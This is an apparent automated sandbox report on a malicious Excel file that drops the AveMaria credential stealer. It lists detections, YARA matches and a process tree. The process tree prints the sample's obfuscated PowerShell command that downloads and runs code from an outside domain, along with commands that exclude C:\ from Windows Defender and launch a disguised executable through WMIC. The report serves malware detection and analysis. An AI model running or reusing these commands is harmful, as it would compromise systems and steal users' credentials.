Play interactive tour

Edit tour

Analysis Report Telex06012020.xls

Overview

General Information

Sample Name:	Telex06012020.xls
Analysis ID:	337287
MD5:	c221348cc4be1ca5c8d1fe510c672e57
SHA1:	b7bbcb23c92782d871a684afc34e4c8264e96b8e
SHA256:	07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9
Tags:	xls
Most interesting Screenshot:

Detection

Hidden Macro 4.0 AveMaria

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected AveMaria stealer

Yara detected Generic Dropper

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to create processes via WMI

Contains functionality to hide user accounts

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides user accounts

Increases the number of concurrent connection per server for Internet Explorer

Installs a global keyboard hook

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to detect virtual machines (SLDT)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file does not import any functions

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Spawns drivers

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Xls With Macro 4.0

Yara signature match

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 6472 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

cmd.exe (PID: 1836 cmdline: CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )) MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5848 cmdline: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )) MD5: DBA3E6449E97D4E3DF64527EF7012A10)

csc.exe (PID: 6108 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 6504 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)

cmd.exe (PID: 7036 cmdline: 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6924 cmdline: 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)

WMIC.exe (PID: 6992 cmdline: Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

Test3.jpg (PID: 6852 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: DD27F33FCD6F1FA4C67EE05D836795C2)

Test3.jpg (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: DD27F33FCD6F1FA4C67EE05D836795C2)

powershell.exe (PID: 5368 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5384 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rdpvideominiport.sys (PID: 4 cmdline: MD5: 0600DF60EF88FD10663EC84709E5E245)

rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)

tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Telex06012020.xls	PowerShell_in_Word_Doc	Detects a powershell and bypass keyword in a Word document	Florian Roth	0x1cf5e:$s1: poWeRSheLL.EXe 0x1cf72:$s2: BYPAsS
Telex06012020.xls	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1cf5e:$s1: poWeRSheLL
Telex06012020.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\DCC40000	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1c7e0:$s1: poWeRSheLL
C:\Users\user\AppData\Local\Temp\Test1.txt	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
C:\Users\user\AppData\Local\Temp\Test1.txt	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x42de8:$c1: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\Test3.jpg	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
C:\Users\user\AppData\Local\Temp\Test3.jpg	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x42de8:$c1: Elevation:Administrator!new:

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xde8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xde8:$c1: Elevation:Administrator!new:
00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x2c8ac:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2c8ac:$c1: Elevation:Administrator!new:
00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x1d88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4b90:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1d88:$c1: Elevation:Administrator!new: 0x4b90:$c1: Elevation:Administrator!new:
00000013.00000002.946480583.0000000003465000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xe08:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xe08:$c1: Elevation:Administrator!new:
00000003.00000003.759722473.00000000061E3000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xba84:$s1: poWeRSheLL
00000013.00000000.780781628.0000000000443000.00000002.00020000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xde8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xde8:$c1: Elevation:Administrator!new:
00000013.00000003.785553106.000000000062C000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3b90:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd88:$c1: Elevation:Administrator!new: 0x3b90:$c1: Elevation:Administrator!new:
00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x1a768:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1a768:$c1: Elevation:Administrator!new:
00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000003.00000003.739726186.000000000071D000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x37b6:$s1: PowerShell 0xdf18:$s1: poWeRSheLL 0x37b6:$sr1: PowerShell 0x37b6:$sn3: PowerShell
00000013.00000002.946136847.0000000002B8F000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xe08:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xe08:$c1: Elevation:Administrator!new:
00000012.00000000.764732381.0000000000443000.00000002.00020000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xde8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xde8:$c1: Elevation:Administrator!new:
00000013.00000002.939727802.000000000054F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000013.00000003.785647201.000000000062C000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x3b90:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd88:$c1: Elevation:Administrator!new: 0x3b90:$c1: Elevation:Administrator!new:
00000013.00000001.781400247.000000000054F000.00000040.00020000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000012.00000002.783515823.0000000002C2F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xe8ac:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2acbc:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xe8ac:$c1: Elevation:Administrator!new: 0x2acbc:$c1: Elevation:Administrator!new:
00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xde8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xde8:$c1: Elevation:Administrator!new:
Process Memory Space: Test3.jpg PID: 5940	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Test3.jpg PID: 5940	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Test3.jpg PID: 6852	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Test3.jpg PID: 6852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.0.Test3.jpg.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
18.0.Test3.jpg.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x42de8:$c1: Elevation:Administrator!new:
18.2.Test3.jpg.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
18.2.Test3.jpg.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x42de8:$c1: Elevation:Administrator!new:
19.2.Test3.jpg.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
19.2.Test3.jpg.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
19.2.Test3.jpg.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
19.2.Test3.jpg.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.Test3.jpg.400000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
19.2.Test3.jpg.400000.0.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
19.2.Test3.jpg.400000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
19.2.Test3.jpg.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.2.Test3.jpg.400000.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
19.2.Test3.jpg.400000.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
18.2.Test3.jpg.2ae0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
18.2.Test3.jpg.2ae0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.Test3.jpg.2ae0000.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
18.2.Test3.jpg.2ae0000.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
18.2.Test3.jpg.2ae0000.1.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
18.2.Test3.jpg.2ae0000.1.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
18.2.Test3.jpg.2ae0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
18.2.Test3.jpg.2ae0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.Test3.jpg.2ae0000.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
18.2.Test3.jpg.2ae0000.1.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
19.0.Test3.jpg.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
19.0.Test3.jpg.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x42de8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x42de8:$c1: Elevation:Administrator!new:
19.1.Test3.jpg.400000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
19.1.Test3.jpg.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.1.Test3.jpg.400000.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
19.1.Test3.jpg.400000.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
19.1.Test3.jpg.400000.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
19.1.Test3.jpg.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
19.1.Test3.jpg.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
19.1.Test3.jpg.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
19.1.Test3.jpg.400000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
19.1.Test3.jpg.400000.0.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
Click to see the 31 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5848, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline', ProcessId: 6108

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

